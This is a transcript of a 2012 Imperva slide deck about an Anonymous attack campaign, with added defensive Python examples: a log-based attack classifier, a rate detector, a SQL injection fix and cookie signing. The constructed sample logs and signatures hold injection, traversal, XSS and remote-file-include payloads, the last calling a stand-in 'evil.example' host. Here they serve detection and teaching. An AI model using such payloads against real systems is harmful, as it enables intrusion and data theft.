Anatomy of a Web Application Attack

Presentation on theme: "Anatomy of a Web Application Attack" — Presentation transcript:

1 Anatomy of a Web Application Attack
June 2012. Terry Ray – VP WW Security Engineering

2 About Imperva – The Leader in Data Security
Imperva protects data and Internet transactions from malicious insiders and external threats.
About Imperva: Founded 2002 by Shlomo Kramer. More than 1700 Enterprise customers across: federal, state, and local government agencies; hundreds of small and medium sized businesses; non-profits and academic institutions. More than 25,500 organizations across 40 countries protected by Imperva.
Database Security: Audit database access and deliver real-time protection against database attacks.
Web Application Security: Protection against large scale Web attacks with reputation controls, automated management and drop-in deployment.
File Security: Auditing, protection and rights management for unstructured data.
“Imperva is helping us protect the security and privacy of customer data, and gain unprecedented visibility into who is accessing this critical operational system.”

3 The Plot
The attack took place in 2011 over a 25 day period. Anonymous was on a deadline to breach and disrupt a website; a proactive attempt at hacktivism. 10-15 skilled hackers. Several hundred to thousands of supporters.

4 On the Defense
The deployment line was a network firewall, IDS, WAF, web servers, network anti-DoS and anti-virus.
Imperva WAF: SecureSphere WAF version 8.5, inline, high availability; ThreatRadar reputation (IP Reputation).
SSL wasn’t used; the whole website was in HTTP.

5 1 Recruiting and Communications

6 An “Inspirational” Video & Social Communication

7 Setting Up An Early Warning System

8 2 Recon and Application Attack
“Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu

9 Step 1A: Finding Vulnerabilities
Tool #1: Vulnerability Scanners. Purpose: Rapidly find application vulnerabilities. Cost: $0-$1000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 MQ) and Nikto (open source).

10 Hacking Tools
Tool #2: Havij. Purpose: An automated SQL injection and data harvesting tool, developed solely to take data transacted by applications. Developed in Iran.

11 Vulnerabilities of Interest
DT (directory traversal), SQLi (SQL injection), XSS (cross-site scripting)

12 US is the ‘visible’ source of most attacks
Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable.
Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses. For all attack types the attackers were spread around the world, but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed came from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.
During the Anonymous attack 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.
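The two measurements the slide leans on, attacks per attacking host and the share of attack events that come from reputation-listed sources, are easy to reproduce from ordinary access logs. The script below is an added example, not code from the deck or from Imperva: it classifies requests with deliberately crude signatures for the four attack types the deck names (SQLi, XSS, RFI, DT), then computes the attack-to-host ratio per type and the fraction of attack events whose source is on a reputation list. The log lines, the IP addresses and the reputation list are constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2012:10:00:01 +0000] "GET /page.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200
203.0.113.7 - - [12/Jun/2012:10:00:02 +0000] "GET /page.php?id=1%27%20UNION%20SELECT%201,2,3,4-- HTTP/1.1" 200
198.51.100.20 - - [12/Jun/2012:10:00:03 +0000] "GET /download.php?file=../../../etc/passwd HTTP/1.1" 404
198.51.100.20 - - [12/Jun/2012:10:00:04 +0000] "GET /download.php?file=../../etc/passwd HTTP/1.1" 404
203.0.113.9 - - [12/Jun/2012:10:00:05 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200
192.0.2.5 - - [12/Jun/2012:10:00:06 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200
192.0.2.5 - - [12/Jun/2012:10:00:07 +0000] "GET /about.html HTTP/1.1" 200
"""

# Constructed reputation list standing in for anonymizing-proxy exit addresses.
ANONYMIZER_IPS = {"203.0.113.7", "203.0.113.9"}

# Common-log-format request line: source ip, timestamp, method, path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Minimal, illustrative signatures; a production WAF uses far richer rules.
SIGNATURES = [
    ("SQLi", re.compile(r"(union\s+select|'\s*or\s+\d+=\d+|--\s*$)", re.I)),
    ("XSS", re.compile(r"<\s*script", re.I)),
    ("RFI", re.compile(r"=\s*https?://", re.I)),
    ("DT", re.compile(r"(\.\./){2,}")),
]


def classify(path):
    """Return the attack label for a request path, or None if it looks benign."""
    decoded = unquote(path)  # signatures are matched on the URL-decoded form
    for label, pattern in SIGNATURES:
        if pattern.search(decoded):
            return label
    return None


def analyze(log_text, reputation_ips):
    """Per-type attack counts, distinct hosts and ratio, plus the share of
    attack events whose source IP is on the reputation list."""
    attacks = Counter()
    hosts = defaultdict(set)
    total = 0
    from_reputation = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        label = classify(m.group("path"))
        if label is None:
            continue
        total += 1
        attacks[label] += 1
        hosts[label].add(m.group("ip"))
        if m.group("ip") in reputation_ips:
            from_reputation += 1
    report = {
        label: {"attacks": n, "hosts": len(hosts[label]), "ratio": n / len(hosts[label])}
        for label, n in attacks.items()
    }
    share = from_reputation / total if total else 0.0
    return report, share


if __name__ == "__main__":
    report, share = analyze(SAMPLE_LOG, ANONYMIZER_IPS)
    for label, stats in sorted(report.items()):
        print(f"{label:5s} attacks={stats['attacks']} hosts={stats['hosts']} ratio={stats['ratio']:.1f}:1")
    print(f"attack events from reputation-listed sources: {share:.0%}")
```

On the constructed sample, half of the attack events come from the two listed anonymizer addresses, which is the kind of figure behind the deck's "74% ... detected by IP reputation" claim; the ratio column is what separates a few busy automated sources from many one-off probes.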

13 Comparing to Lulzsec Activity
Lulzsec was/is a team of hackers focused on breaking applications and databases. ‘New’ Lulzsec taking credit for recent attacks: Militarysingles.com. Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used: SQL Injection, Cross-site Scripting and Remote File Inclusion (RFI/LFI). RFI: index.php

14 Lulzsec Activity Samples
1 infected server ≈ 3000 bot infected PC power. 8000 infected servers ≈ 24 million bot infected PC power.

15 Automation is Prevailing
In one hacker forum, one hacker claimed to have found 5012 websites vulnerable to SQLi through automation tools. Note: Due to automation, hackers can be effective in small groups – i.e. Lulzsec, Anti-Sec, OpIndia, etc. Automation also means that attacks are equal opportunity offenders. They don’t discriminate between well-known and unknown sites or agencies. They don’t need ‘skillz’ to steal data or DDoS.
Most notably, the ADC found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation also means that attacks are equal opportunity offenders; they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations.
According to the study, websites experience an average of 27 attacks per hour or about once every two minutes. However, 27 attacks per hour is only an average. When sites come under automated attack, the target can experience up to 25,000 attacks per hour or 7 per second.
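The gap between the 27-attacks-per-hour baseline and a 25,000-per-hour automated burst is what makes rate-based detection practical: a scripted scanner stands out from background noise long before a full hour elapses. The sliding-window detector below is an added example (not the deck's or Imperva's code) that flags a source once it exceeds a per-minute threshold; the window size, the threshold and the event stream are constructed for the example, and the threshold is deliberately set far above the page's average rate so that ordinary traffic is never flagged.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60
# Constructed threshold: more than 60 events from one source inside a minute
# (3,600/hour) is well above the page's 27/hour baseline and well below the
# 25,000/hour (~7/s) seen under automated attack.
THRESHOLD = 60


def rate_per_hour(count, window_seconds):
    """Project a per-window count to the hourly figure the page quotes."""
    return count * 3600 / window_seconds


def detect_bursts(events, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """events: iterable of (timestamp_seconds, source_ip), sorted by time.
    Returns {source_ip: first timestamp at which the window count exceeded threshold}."""
    windows = defaultdict(deque)  # per-source timestamps within the current window
    flagged = {}
    for ts, ip in events:
        q = windows[ip]
        q.append(ts)
        while q and ts - q[0] >= window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def constructed_events():
    """Constructed stream: one slow source and one scripted scanner."""
    events = []
    # slow source: 5 requests spread over an hour (below the page's average)
    for i in range(5):
        events.append((i * 720.0, "198.51.100.1"))
    # scripted source: 100 requests at 5 per second, starting at t=100 s
    for i in range(100):
        events.append((100.0 + i / 5, "203.0.113.50"))
    events.sort()
    return events


if __name__ == "__main__":
    for ip, ts in detect_bursts(constructed_events()).items():
        print(f"{ip} exceeded {THRESHOLD}/min at t={ts:.1f}s "
              f"(>= {rate_per_hour(THRESHOLD + 1, WINDOW_SECONDS):.0f}/hour)")
```

The scanner is flagged 12 seconds into its run, on its 61st request; the slow source never accumulates more than one event per window. In a real deployment the per-source key would typically be combined with the reputation lookup from the previous slide, since anonymizing services spread a single campaign across many exit addresses.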

16 Stop Automated Attacks
Mitigation: AppSec 101
Code Fixing
Dork Yourself
Blacklist + IP Rep
WAF + Mitb
WAF + VA
Stop Automated Attacks
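"Code Fixing" is the mitigation that removes the SQLi class the Havij slide describes rather than just detecting it. As an added example (not from the deck or from Imperva), the snippet below shows a lookup built by string concatenation beside its parameterized replacement, using Python's sqlite3 module on an in-memory table constructed for the example; the user ids and rows are placeholders.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for an application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """The 'before': the request parameter is pasted into the SQL text, so any
    operator the client supplies is parsed as part of the query."""
    sql = "SELECT name, email FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, user_id):
    """The fix: validate the parameter's type, then bind it as a value.
    A bound parameter is never parsed as SQL, whatever it contains."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT name, email FROM users WHERE id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, id=1      :", lookup_vulnerable(conn, "1"))
    print("vulnerable, tautology :", lookup_vulnerable(conn, "1 OR 1=1"))
    print("fixed, id=1           :", lookup_fixed(conn, "1"))
    try:
        lookup_fixed(conn, "1 OR 1=1")
    except ValueError as e:
        print("fixed, tautology      : rejected,", e)
```

The tautology input returns every row through the concatenated query and is rejected outright by the fixed one; automated tools such as the one on slide 10 depend on exactly this difference, so the parameterized form is the change that takes the application out of their reach regardless of what the WAF in front of it sees.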

17 3 Application DDoS

18 LOIC Facts
Low Orbit Ion Cannon (LOIC). Purpose: DDoS. Mobile and JavaScript variations. Other variations – HOIC, GOIC, RefRef.
LOIC downloads: 2011: 381,976. 2012 (through May 10): 374,340. By June 2012, roughly 98% of 2011’s downloads!

19 Anonymous and LOIC in Action
[Chart: transactions per second, comparing LOIC in action against average site traffic]

20 Application DDoS
“The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit.” —The Hacker News, July 30, 2011

21 4 Non-Mitigations

22 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. WAFs at a minimum must include the following to protect web applications:
Web-App Profile
Web-App Signatures
Web-App Protocol Security
Web-App DDoS Security
Web-App Cookie Protection
Anonymous Proxy/TOR IP Security
HTTPS (SSL) visibility
Security Policy Correlation

23 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. However, IPS and NGFWs at best only partially support the items marked in red on the original slide:
Web-App Profile
Web-App Signatures
Web-App Protocol Security
Web-App DDoS Security
Web-App Cookie Protection
Anonymous Proxy/TOR IP Security
HTTPS (SSL) visibility
Security Policy Correlation
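"Web-App Cookie Protection" on both of the slides above refers to detecting cookies that were altered after the application issued them, something a packet-level IPS has no basis to judge. The snippet below is an added example, not from the deck or from Imperva, of the usual mechanism: the issuer appends an HMAC over the cookie value, and the verifier recomputes it with a constant-time comparison. The secret key and the cookie contents are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed demo key; a real deployment loads this from a secret store.
SECRET = b"constructed-demo-secret"


def sign_cookie(value: str, key: bytes = SECRET) -> str:
    """Return value + '.' + base64url(HMAC-SHA256(key, value))."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).digest()
    tag = base64.urlsafe_b64encode(mac).rstrip(b"=").decode()
    return f"{value}.{tag}"


def verify_cookie(cookie: str, key: bytes = SECRET):
    """Return the original value if the tag matches, else None.
    The tag is base64url and never contains '.', so the last '.' is the split point."""
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # no tag at all
    expected = sign_cookie(value, key).rpartition(".")[2]
    if hmac.compare_digest(expected, tag):  # constant-time, no timing side channel
        return value
    return None


if __name__ == "__main__":
    issued = sign_cookie("role=user")
    print("issued  :", issued)
    print("verify  :", verify_cookie(issued))
    print("tampered:", verify_cookie(issued.replace("role=user", "role=admin")))
```

A tampered value, a missing tag, or a tag computed under a different key all verify to None, which is the signal a WAF or the application itself uses to drop the request; the scheme gives integrity only, so anything that must stay secret still belongs server-side, not in the cookie.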

24 Recent attacker targets:
US Department of Justice, US Copyright Office, FBI, MPAA, Warner Brothers, RIAA, HADOPI, BMI, SOHH, Office of the AU Prime Minister, AU House of Parliament, AU Department of Communications, Swiss bank PostFinance, Fine Gael, New Zealand Parliament, Tunisia Government, Zimbabwe Government, Egyptian Government, Itau, Banco de Brazil, US Senate, Caixa, Church of Scientology, Muslim Brotherhood, Zappos.com, MilitarySingles.com, Amazon, Austria Federal Chancellor, HBGary Federal, Mexican Interior Ministry, Mexican Senate, Mexican Chamber of Deputies, Irish Department of Justice, Irish Department of Finance, Greek Department of Justice, Egyptian National Democratic Party, Spanish Police, Orlando Chamber of Commerce, Catholic Diocese of Orlando, Bay Area Rapid Transit, PayPal, Mastercard, Visa.
How many of these organizations have AV, IPS and Next Generation Firewalls? Why are the attacks successful when these technologies claim to prevent them?

25 5 Demo
